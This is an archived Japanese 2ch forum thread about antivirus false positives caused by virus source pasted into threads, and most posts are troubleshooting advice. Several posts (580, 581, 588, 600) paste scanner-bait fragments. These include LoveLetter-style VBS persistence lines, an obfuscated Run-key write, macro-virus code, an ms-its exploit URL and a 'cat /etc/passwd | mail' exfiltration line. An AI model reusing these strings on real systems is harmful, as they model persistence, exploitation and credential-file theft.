ノートンがvbsウィルスのソースに誤反応３

[表示 : 全て最新50 1-99 101- 201- 301- 401- 501- 601- 701- 2chのread.cgiへ]
Update time : 12/10 22:53 / Filesize : 258 KB / Number-of Response : 783
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

1 名前：他のアンチウィルスソフトが反応する場合もあります mailto:sage [05/03/01 01:58:58 ID:???]: 只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の（このvbsの）質問が多すぎるのでこのスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。

■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。（設定によっては反応しないこともありますが、全く問題ありません）
ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。

■まとめと対策■
２ちゃんねる見ていたらvbsウィルスが検出された！
info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか？
info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。

前スレ
ノートンがvbsウィルスのソースに誤反応
pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応２
pc5.2ch.net/test/read.cgi/pcqa/1033948204/

テンプレ>>1-10あたり
541 名前：538 mailto:sage [2006/05/24(水) 02:24:00 ID:???]: >>540
グミクズがさっさと教えろや
542 名前：538 [2006/05/24(水) 03:34:43 ID:uOt5d8a9]: >>540
レスありがとうございます。
ログフォルダの指定は合っていました。
ウィルスの検出場所は、Live2ch\temp.htm、という所です。
このHTMLファイルをNAVの除外に設定すればいいんですかね？
それとも止めといたほうがいいですか？（このファイルを削除しても意味無しですよね）
よろしければレスお願いします。
>>541
ID隠して騙りは止めてね
543 名前：538 [2006/05/24(水) 03:39:57 ID:uOt5d8a9]: >>540
言い忘れました、ちなみに
Live2ch\temp.htmはログフォルダの外にあるファイルです。
544 名前：ぴーこ名無しさん mailto:sage [2006/05/24(水) 04:07:14 ID:???]: >>542-543
こちらでも確認しました。
Live2chのスレビューはdatをtemp.htmに通して表示するので反応しているようです。
temp.htmを除外に加えたら正常に表示されました。

注意点はウイルスコードをhtmlに埋め込むことになるのでtemp.htmをIEなどのwebブラウザでは開かないでください。
また、2ちゃんねるブラウザの脆弱性を突いたウイルスコードも出る可能性もありますのでノートン本スレや
お使いの2ちゃんねるブラウザのスレを見るようにしてください。
545 名前：ぴーこ名無しさん mailto:sage [2006/05/24(水) 04:18:41 ID:???]: >>544追記
Live2chのfaqが過去ログにありました。>>84 orz.......

参考に
pc7.2ch.net/test/read.cgi/software/1141544659/484-n dat落ち
ttp://220.254.5.211:8000/2ch/pc7_software/1141/1141544659.html#484 ミラー
546 名前：538 [2006/05/24(水) 04:40:48 ID:uOt5d8a9]: >>545
わざわざ再現までしていただき（しかもこんな夜中に）すみません。。。
temp.htmを除外に加えたら、無事このスレもLive2chで見る事が出来ました。
ありがとうございます！
しかも、過去ログまで探してくれたんですね、、、ありがとうございます。
547 名前：ひよこ名無しさん mailto:sage [2006/05/24(水) 04:47:04 ID:???]: >>546
俺も暇だからよー
548 名前：ひよこ名無しさん mailto:sage [2006/05/24(水) 13:46:43 ID:???]: >>546
俺も暇だからよー
549 名前：cen ◆Am9xOgNMYE mailto:sage [2006/05/30(火) 02:32:01 ID:??? BE:137160162- ]: こんばんは。
>>17のソフトですが、対応するスクリプトを増やしました。
それから、検索の途中で中止できるようにしました。
550 名前：cen ◆Am9xOgNMYE mailto:sage [2006/05/30(火) 02:32:51 ID:??? BE:114300252- ]: 忘れてました。
こちらです。
www.geocities.jp/cen_hp/index.html
551 名前：ひよこ名無しさん mailto:sage [2006/05/31(水) 22:57:19 ID:???]: bbs.cgiが更新されて>>4のような置換がちゃんと行われるようになった模様です
今後はウィルスコード貼っても反応しなくなるのかな
552 名前：ひよこ名無しさん mailto:sage [2006/06/01(木) 00:54:09 ID:???]: ダメですた
news18.2ch.net/test/read.cgi/mnewsplus/1149087966/66
>>4は完全に嘘であることが判明したので
次スレから削除かな
削除するだけだと「親切にも」追記する人が現れかねないから
別のテンプレに差し替えた方がいいかな
553 名前：cen ◆Am9xOgNMYE mailto:sage [2006/06/01(木) 01:06:54 ID:???]: >>552
>>4の置換で反応しないものもありますが、反応するものも
あります。完全に嘘というわけではないです。
554 名前：ひよこ名無しさん mailto:sage [2006/06/01(木) 01:23:16 ID:???]: どっちにしろ置換するようになったんだから>>4は大幅書き換えが必要
555 名前：cen ◆Am9xOgNMYE mailto:sage [2006/06/02(金) 01:25:51 ID:???]: こんばんは。
>>17のソフトですが、フォルダの設定によって検索できない場合
がありましたので、修正しました。
www.geocities.jp/cen_hp/index.html
556 名前：ぴーこ名無しさん mailto:sage [2006/06/02(金) 02:28:30 ID:???]: >>4のテンプレ案です。
単純に文字参照を抜いてみました。

ノートンが反応するのは、ここの掲示板（2ちゃんねる）の仕様です。
ここは、時に他のウィルス対策ソフトが反応する場合もあります。

断言できることは、他のWebページでノートンが反応した場合は要注意ということ。

尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
find.2ch.net/?STR=%CD%A6%B5%A4%A4%AC%CC%B5%A4%AF%A4%C6+%B2%F2%C0%E2%A5%B9%A5%EC&COUNT=50&TYPE=TITLE&BBS=ALL

■関連
ノートントラップ
ansitu.xrea.jp/guidance/?Trap#NortonTrap
ノートンインターネットセキュリティ＠２ちゃんねる検索
find.2ch.net/?STR=%A5%CE%A1%BC%A5%C8%A5%F3+%8E%B2%8E%DD%8E%C0%8E%B0%8E%C8%8E%AF%8E%C4%8E%BE%8E%B7%8E%AD%8E%D8%8E%C3%8E%A8+board%3A%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3&COUNT=50&TYPE=TITLE&BBS=ALL
557 名前：ひよこ名無しさん mailto:sage [2006/06/02(金) 04:54:27 ID:???]: >>556
Q. 2chが文字を置換しないのが悪いって聞いたんだけど
A. 情報が古いと思われます。2006年6月から置換するようになりましたが、
　問題の文字を使わなくてもノートンが誤検出する文字列は作れるので
　相変わらず反応する場合があります。

↑とか追加した方がいい。単に消すと
> 「親切にも」追記する人が現れかねないから
を防げない。
558 名前：ぴーこ名無しさん mailto:sage [2006/06/03(土) 22:00:18 ID:???]: Q. 2ちゃんねるが文字を置換しないのが悪いって聞いたんだけど
A. 2006年6月から置換するようになりましたが、
　ノートンが誤検出する置換できないウィルスコードがあるので反応します。

　ノートンがウイルスソースに誤反応の補足
　 ansitu.xrea.jp/guidance/?supplement#o0c3cb41

ノートンが反応するのは、ここの掲示板（2ちゃんねる）の仕様です。
ここは、時に他のウィルス対策ソフトが反応する場合もあります。

断言できることは、他のWebページでノートンが反応した場合は要注意ということ。

尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
find.2ch.net/?STR=%CD%A6%B5%A4%A4%AC%CC%B5%A4%AF%A4%C6+%B2%F2%C0%E2%A5%B9%A5%EC&COUNT=50&TYPE=TITLE&BBS=ALL

■関連
ノートントラップ
ansitu.xrea.jp/guidance/?Trap#NortonTrap
ノートンインターネットセキュリティ＠２ちゃんねる検索
find.2ch.net/?STR=%A5%CE%A1%BC%A5%C8%A5%F3+%8E%B2%8E%DD%8E%C0%8E%B0%8E%C8%8E%AF%8E%C4%8E%BE%8E%B7%8E%AD%8E%D8%8E%C3%8E%A8+board%3A%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3&COUNT=50&TYPE=TITLE&BBS=ALL

>>557
ﾉｼｼ
以前の説明をwikiに誘導する形にしてみました。
559 名前：ひよこ名無しさん mailto:sage [2006/06/04(日) 10:03:06 ID:???]: u
560 名前：ひよこ名無しさん mailto:age [2006/06/04(日) 10:27:58 ID:???]: 保守
561 名前：ひよこ名無しさん mailto:sage [2006/06/05(月) 19:23:06 ID:???]: jane doe view使ってるんですが、
ノートントラップのウィルスコード貼られたスレ取得障害になったり、
ここのＰＣ初心者板なんかはノートン切らないと来れません。
それで対策として書かれてる見て、
ノートンアンチウィルスの手動＆オートの除外項目から、
viewのLogsフォルダを両方除外したんですが、
それでも駄目なままです。
他に何をしないといけないんでしょうか？
562 名前：ひよこ名無しさん mailto:sage [2006/06/05(月) 19:44:30 ID:???]: ここを読み直せ
563 名前：ひよこ名無しさん [2006/06/06(火) 18:14:41 ID:yssu6HWa]: ウィルスコードに反応したせいで、取得したログが消滅するのについては、
ログフォルダを除外すればいけるわけですが、
最近のウィルスコードは進化してて、
Autoblockで侵入感知反応してしまって、
２ｃｈの該当ＩＰをアク禁にしてしまってるようなんです。
この場合の対応はどのようにすればよいでしょうか？
ノートン切らないと、ログを取得するどころか、
スレ単位、はなはだしくは板単位でアクセスすらできません。
564 名前：ひよこ名無しさん mailto:sage [2006/06/06(火) 18:17:44 ID:???]: >>563
リカバリしろデブ。
565 名前：ひよこ名無しさん mailto:sage [2006/06/06(火) 18:30:21 ID:???]: どの専ブラでも基本はログと書き込みフォルダを
除外すればおｋ?
566 名前：ぴーこ名無しさん mailto:sage [2006/06/07(水) 01:17:37 ID:???]: >>563
mickey.mirv.net/2chnis.html

>>565
ttp://ansitu.xrea.jp/guidance/?Trap#NortonTrap の3番目
詳しくはお使いの2ちゃんねるブラウザのヘルプ・スレ等で確認してください。
567 名前：ひよこ名無しさん mailto:sage [2006/06/07(水) 18:58:51 ID:???]: >>564
リカバリしろデブ。
568 名前：<body onload=window()> mailto:eip = eip + unescape("%u7030%u4300") [2006/06/08(木) 03:34:49 ID:???]: p + w * 10 <br> End Sub <br>
LOVE-LETTER-FOR-YOU
569 名前：ひよこ名無しさん mailto:sage [2006/06/08(木) 03:36:10 ID:???]: >568
570 名前：ひよこ名無しさん mailto:sage [2006/06/08(木) 04:18:57 ID:???]: さっきこのウィルスソースが２ちゃん掲示板に埋められてるのを見てしまったら、
ウィルスソフトは反応しなかったのですが、
いきなり２ちゃん掲示板の行間が広くなってしまいました。
ネットから接続を切って履歴とかTemporaryInternetFileとか全部削除してから
ウィルスチェックをしましたが反応なし。

これはブラウザの表示は変になったけど感染はしなかったということで大丈夫なのでしょうか？

ブラウザは専ブラじゃなくIEで、ウィルスソフトはソースネクストのウィルスセキュリティです。
571 名前：ひよこ名無しさん mailto:sage [2006/06/08(木) 04:21:40 ID:???]: 570ですが補足です。
表示したスレは
ttp://news19.2ch.net/test/read.cgi/newsplus/1149683324/l50
で、ここの>>5にそのソースが書いてありました。
572 名前：ひよこ名無しさん mailto:sage [2006/06/08(木) 04:23:53 ID:???]: >>570
行間が広くなるのはシリア語ブラクラじゃないのか？
573 名前：ひよこ名無しさん mailto:sage [2006/06/08(木) 04:27:58 ID:???]: >>571
5の最後の行にシリア語書いてあるね
574 名前：ひよこ名無しさん mailto:sage [2006/06/08(木) 04:48:56 ID:???]: >>572-573
レスありがとうございます。
シリア語ブラクラだと行間が広くなる以外の被害はないですか？
初めて聞いたもので＞シリア語ブラクラ

さきほど念のためもう一度ウィルスチェックしましたがウィルス発見なしでした。
ブラウザと閉じるときにInternetTemporaryFileの中身を削除する設定にしてあるのですが
こちらも念のためInternetTemporaryFileの中身も確認してみましたが
cookieファイルとfaviconファイルのみ格納されていました。
「html」「htm」がなくなってれば大丈夫ですかね？
575 名前：ひよこ名無しさん mailto:sage [2006/06/08(木) 05:11:57 ID:???]: 　　　　／￣￣￣￣￣￣￣＼　
　　　　｜ ○。　　　　　　　　｜
　　　　ﾉﾉ)　　　　　　　　　　　从
　　　( i从〓〓　　　　　　〓〓.从
　　　.从-=・=-　　　　　　-=・=-从
　　从从. 　　　　　ｌ　　　　　　从）
　　（从.ｌ∴　　　　 ∨ 　　　 ∴从人）
　（人人|∴ ヽ　.ｰ===-'　./.∴..从人）　　＜無職元祖ぶる殿 ◆U/gDqFZzsY蚤
　（人人|∴∴!　　￣　　　!∴∴ｌ从人）　　
　（人人|∴∴!.　　　　　　 !∴∴ｌ从人）　　　
　（人人|∴∴!.　　　　　　 !∴∴ｌ从人）
..（人人人＿人＿＿＿＿人＿.人人人）
〔ﾉ二二,＿＿_　　　　　　　＿＿,二二ヽ〕
　|:::::::::::::::::::::::::ヽ゜　　　゜/:::::::::::::::::::::::::/
　〉:::::::::　:::::::::::::〉__∩__〈::::::::::::::　::::::::〈　
　|:::::::::::::::::::::::／＼￣／ヽ:::::::::::::::::::::/
〔:::::::::::::::::::::/　　ノ ~ヽ　ヽ::::::::::::::::::|
ヽ:::::::::::::::::/　／:::::::::::: ＼　):::::::::::::::::::ゝ
ﾉ:::::::::::::::::::|　|_～─ー＝ - |　|～～～/
576 名前：ひよこ名無しさん mailto:age [2006/06/12(月) 11:39:57 ID:???]: このスレだと反応しないのは何で？
577 名前：ひよこ名無しさん mailto:sage [2006/06/13(火) 14:13:25 ID:???]: 特定のスレに擬似ウィルスコード貼り付ける奴がいて困ってます。
ノートンのauto protect と手動スキャンで、
専ブラを除外するように設定してるんですが、スレを開くとエラーになってしまいます。
ttp://ansitu.xrea.jp/guidance/?NortonInternetSecurity
このサイトに書かれてる、信頼のアドレスを追加の設定はしました。

エラーのログを取得して、弾かれて、
有志さんの誤反応無効化スクリプトで書き換えて、
時間たつのまってから閲覧。しかもレス番はズレでわけわかめ
という状態です。
何かうまく弾く方法はないんでしょうか？
578 名前：ひよこ名無しさん mailto:sage [2006/06/13(火) 20:49:00 ID:???]: >>577
きちんと専ブラのログを除外する
579 名前：577 mailto:sage [2006/06/14(水) 13:32:40 ID:???]: >>578
僕の分かるように１～１０までしっかりすべてと教えて下さい。

さっさと、教えろボケこのやろう
　　　　　　　　　　　　　　 ∧＿∧
　　,,,,,,,,,,,,,,,∧,,∧　　　　（　´∀｀）　＼
～′,,,,,,,,,,ミ,,ﾟДﾟ彡　　　/　　つ℃━━━━━━━━━━━━
　　UU""""U U　　　～(_つ　つ　　　　＼へへ＿　　　　　　　｜
――――――――――――――――｜　　　　　　　　.　　｜
　　　　　　　　　　　　　　　　　　　　　　　｜　　　　　　　　　　｜
　　　　　　　　　　　　　　　　　　　　　　　｜へ＿＿　　　　.　　｜
　　　　　　　　　　　　　　　　　　　　　　　｜　　　　　　　　　　｜
へ＿＿＿＿へ＿＿/＿＿＿へへ＿＿へ＿＿＿＿＿＿　　｜
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　｜
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　｜　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　｜
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　（（　｜　））
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　｜　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　｜
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　｜　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　｜
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　｜　　　　
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　｜～～～ヽ｀∀´>ヾ〕∈
580 名前：ひよこ名無しさん mailto:sage [2006/06/17(土) 22:54:14 ID:???]: >>2ё

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "＼" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
581 名前：ひよこ名無しさん [2006/06/18(日) 17:52:54 ID:k4PxNBCi]: <body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
582 名前：ひよこ名無しさん mailto:sage [2006/06/18(日) 18:33:56 ID:???]
583 名前：ひよこ名無しさん mailto:age [2006/06/20(火) 00:04:58 ID:???]: 時々スレを転々としてると、急に変な改行になるんですが（文と文の隙間が全部空いてしまう）
これってウイルスに侵されてるのでしょうか？
584 名前：ひよこ名無しさん mailto:sage [2006/06/20(火) 01:18:31 ID:???]: 　　　　　　　　　　　　　l'vﾍ
　　　　　　　　　ﾊ　┌( ;/ ﾄ,　,、 rﾍ　 r'^ﾅrジ-z
　　　 __}ヽ,__　(ヽ/ス_r^フしz,り　い)ｎ／ｲr～^′
　　　'っヾ､r'__ 　|ﾚ'ノ_C'入彳勺ｿメろ_ｊ／し-,_
　　　　｀フヾ勹_| <_r' !|刀_｣r''>||／⌒(_rﾍ-‐'
　　　　　＜_ゝし||ﾌぅ（ひzメ__ゝ'l !'そ
　　　　　　　 ~zヾ|て､l レ^ //'| |'~
　　　　　　　 | |　ヽl｜ //　}｜
　　　　　　　 | :!　｜|　| | ,/ ,'
　　　　　　　　　 | :{.　|｜ | |/ /　　すいません、ちょっと通りますよ・・・
　　　　　　　　 l　!｜|　| | /
　　　　　　　　　　ヽヽ.|/ //
　　　　　　　　　　_,r)_ j (_,(　　　　　　　　　　　ciz
　　　　　　　　　,ﾉこ_-　__,ｰヽ　　　　　　　　ん|Zゥﾚz　ｚjそ_
　　　　　　　　 }　　　　... 　丿　　　　　ろ､,_!|乙7ﾑLそ/し-z
　　　　　　　　ﾉ""''　　一（　　　　　　｀う.l !シ/ア了//_⊂,
　　　　　　／､__　　　　　　ヽ　　　　　　 ^'| |~//,/_ソハr^
　　　　 /　　　 ...... 　　　ーl　　　　　　　 | |// /／ノ
　　　　　/~"'　､＿_／　　　,,,...}　　　　　　　|/ /／／　　　　　　 _Jv　,､ _,、
　　　　 {'　_　　`y′　一　　/　　　　　　 r'～(_ノ　　　　　 z'jく|!ぞぅﾝそ
　　　　人　　=/‐-　　　　ﾊ　　　　　　丿" 　''(　　　　　　ぅY||/ｿ'／｀′
　　　　　　ヽ '' /　　__,,　　/　　　　　　　/　‐-　 '''）　　　　　　| ﾚ'//
　　　　　　 '∨　　　　　X.　　　　　　　 }'''　　....ノ　　　　　　　　ﾉﾑxく
　　　　　　　j　　ー／　　　　　　　　/==　　ノ'ヽ　　　　　　　ｒご　ｰ（
　　　　　　　/=‐　 r'´-ヽ　　　　　　　}　　ｰ/'''' 　{　　　　　 ,ﾉ''　y'　...）
　　　　　　 ,'　_,,　人　''"｀、　　　　　ﾉ.. '' ノ`ヽ ''"ヽ　　　　 /　ｰ人.... （
　　　　　 {ー　/　　＼ -'}　　　　　/　／　　　＼'''}` 　　（'' ィ´ 　＼_ヽ
　　　　　　ﾊ　〈　　　）八　　　（　ｆ　　　　　　)ﾊ.　　　　）ﾉ　　　 _)ﾉ
　　　　　　　ヽ　）　　　（(　　　　　）ﾉ　　　　／　　　　ｰ'′
585 名前：dirsystem&"\MSKernel32.vbs mailto:ms-its:mhtml:file://C: [2006/06/20(火) 01:55:47 ID:???]: >>568
586 名前：あぼ～ん mailto:sage [2006/06/20(火) 01:56:38 ID:???]: >>568 >>585
587 名前：ひよこ名無しさん mailto:sage [2006/06/20(火) 02:15:03 ID:???]: >>583
シリア語ブラクラ
これを使うといい。
www.geocities.jp/cen_hp/program3.html
588 名前：ひよこ名無しさん mailto:sage [2006/06/20(火) 23:24:54 ID:???]: <body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
589 名前：ひよこ名無しさん [2006/06/21(水) 12:18:24 ID:nQsDrOZ+]: このスレに貼ってあるソースは大丈夫なのですか？
例えば>>580-581とか、>>588とか…
このスレだと反応ないんですが、何か特別なのでしょうか？
590 名前：ひよこ名無しさん [2006/06/21(水) 14:23:42 ID:fhcCUte2]: テスト
591 名前：ひよこ名無しさん mailto:sage [2006/06/21(水) 20:24:45 ID:???]: >>589
心配しすぎだと思うんです（＞＜）
これが動いたら2chは大騒ぎになっちゃうと思うんです（＞＜）
592 名前：ひよこ名無しさん。 mailto:sage [2006/06/21(水) 23:50:37 ID:???]: NGワードあぼ～んすればおｋ
593 名前：ひよこ名無しさん [2006/06/22(木) 20:26:16 ID:l9A+tZtH]: 誘導されてきました

導入しているマカフィーでスキャンかけても何の反応もなかったんですが、
ノートンのオンラインスキャンやってみると
感染ファイルが二個みつかって
C:\Program Files\gikoNavi\Log\2ch\aasaloon\Folder.idx は　Bloodhound.Exploit.6 に感染しています。
C:\Program Files\gikoNavi\Log\2ch\aasaloon\subject.txt は　Bloodhound.Exploit.6 に感染しています。
と言う表示が出ました。
これは危険なんでしょうか。それともただのウィルスコード？
594 名前：ひよこ名無しさん mailto:sage [2006/06/22(木) 20:27:57 ID:???]: >>593
ただのウィルスコード
これで消せる。
www.geocities.jp/cen_hp/program3.html
595 名前：ひよこ名無しさん mailto:sage [2006/06/22(木) 20:28:13 ID:???]: >>593
ノートンがvbsウィルスのソースに誤反応３
pc7.2ch.net/test/read.cgi/pcqa/1109609938/
596 名前：ひよこ名無しさん mailto:sage [2006/06/22(木) 20:28:47 ID:???]: >>594
cen乙
597 名前：ひよこ名無しさん mailto:sage [2006/06/22(木) 20:30:04 ID:???]: >>594-596
レス早いなｗ
598 名前：ひよこ名無しさん mailto:sage [2006/06/22(木) 20:41:25 ID:???]: 粘着してリロードしながら監視してるんだろ？www
599 名前：ひよこ名無しさん [2006/06/22(木) 20:44:02 ID:l9A+tZtH]: >>594
ありがとうございます。
見分けるコツみたいなものはあるんですか？
600 名前：ひよこ名無しさん mailto:sage [2006/06/22(木) 22:08:53 ID:???]: <body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
601 名前：ひよこ名無しさん mailto:sage [2006/06/23(金) 00:17:41 ID:???]: ノートンがvbsウィルスのソースに誤反応３
pc7.2ch.net/test/read.cgi/pcqa/1109609938/

テンプレにでも入れるか・・・？
脳豚使うなら自力で何とかしろよ・・・
602 名前：ひよこ名無しさん mailto:sage [2006/06/23(金) 00:18:16 ID:???]: 誤爆
603 名前：ひよこ名無しさん mailto:sage [2006/06/23(金) 18:23:08 ID:???]: ＿＿＿ゲームキャラ板でもﾓﾆｶﾜｲｲモニカ様＿＿＿
game10.2ch.net/test/read.cgi/gamechara/1146829934/

このスレを開くと閲覧できないどころか
一回再起動しないとgame10鯖に繋がらなくなる障害が出るんですが
ＮＧコードとかどう打って対処すればいいのですか？
604 名前：ひよこ名無しさん [2006/06/23(金) 18:23:47 ID:6hQn7KgH]: 使用２ｃｈブラウザは　Ｊａｎｅ　Ｄｏｅ　Ｓｔｙｌｅです。
605 名前：ひよこ名無しさん mailto:sage [2006/06/23(金) 18:25:27 ID:???]: >>604
回答めんどいからこのスレ内検索して
606 名前：ひよこ名無しさん mailto:sage [2006/06/23(金) 22:47:16 ID:???]: >>599
専用ブラウザでスレを取得した「だけ」で反応したら間違いなく誤反応なので心配無用。
スレに貼られたURLをクリックして反応したならウィルスの疑いあり。
てゆーか、やたらとクリックしちゃダメ。
607 名前：ひよこ名無しさん mailto:age [2006/06/28(水) 16:58:31 ID:???]: age
608 名前：ひよこ名無しさん [2006/06/29(木) 15:09:12 ID:C6iUe2mV]: Your attention,Please. みなさまに申し上げます
fire drill 火災避難訓練
609 名前：ひよこ名無しさん mailto:age [2006/06/29(木) 19:41:48 ID:???]: age
610 名前：ひよこ名無しさん mailto:sage [2006/06/29(木) 21:38:29 ID:???]: pc7.2ch.net/test/read.cgi/pcqa/1151570961/111-

111 名前：ひよこ名無しさん投稿日：2006/06/29(木) 21:33:23 ID:P5JFBD43
キャップもらってパスワードもらって、名前欄に書き込んでも、
○★　にならなくて○◆になってしまうんですが、どうしてでしょうか

113 名前：愛新覚羅 ◆WjkbiI..A2 投稿日：2006/06/29(木) 21:34:04 ID:???
>>111
ｳｲﾙｼかな
611 名前：ひよこ名無しさん [2006/06/30(金) 22:56:15 ID:2Lq/lYYu]: テスト
